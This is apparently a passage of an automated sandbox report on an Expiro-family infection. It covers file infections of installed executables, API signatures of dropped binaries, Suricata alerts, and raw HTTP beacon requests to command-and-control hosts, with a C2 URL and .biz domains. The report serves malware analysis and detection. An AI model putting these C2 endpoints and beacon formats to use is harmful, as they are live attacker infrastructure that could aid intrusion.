                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,12_2_00007FF627ABC6F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,12_2_00007FF627B2234C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B23100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B23100
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B210C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B26F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,12_2_00007FF627B26F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B03674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,12_2_00007FF627B03674
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,12_2_00007FF627ACD4A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,12_2_00007FF627AC5E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,12_2_00007FF627ACDBC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B21B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,12_2_00007FF627B21B04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B219F8 #359,FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF627B219F8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02DF5908
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF706EB1560
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49817 -> 54.244.188.177:80
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:62395 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:65337 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:62937 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:57324 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50027 -> 34.211.97.45:80
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55594 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.10:50727 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50109 -> 54.244.188.177:80
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:62389 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.10:57250 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.10:55845 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50229 -> 18.208.156.248:80
                      Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.10:65043 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:49726 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.10:53030 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.10:57393 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.10:51342 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64376 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.10:51678 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.10:54841 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.10:56235 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:63327 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:57486 -> 1.1.1.1:53
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Queries random domain names (often used to prevent blacklisting and sinkholes)
                      Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                      Source: unknownNetwork traffic detected: DNS query count 131
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0E4B8 InternetCheckConnectionA,15_2_02E0E4B8
                      Source: global trafficTCP traffic: 192.168.2.10:49859 -> 51.195.88.199:587
                      Source: global trafficDNS traffic detected: number of DNS queries: 131
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49813
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49813
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49801
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49801
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49837
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49837
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50037
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50027
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50027
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50037
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50022
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50022
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50000
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50034
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50034
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50035
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50035
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50066
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50066
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50000
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50079
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50079
                      Source: global trafficTCP traffic: 192.168.2.10:49859 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /nkrerhrn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /iu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /obvywkjre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /njfejhipdedfbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gcjwtno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /itufvxod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /jpdqgjmmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
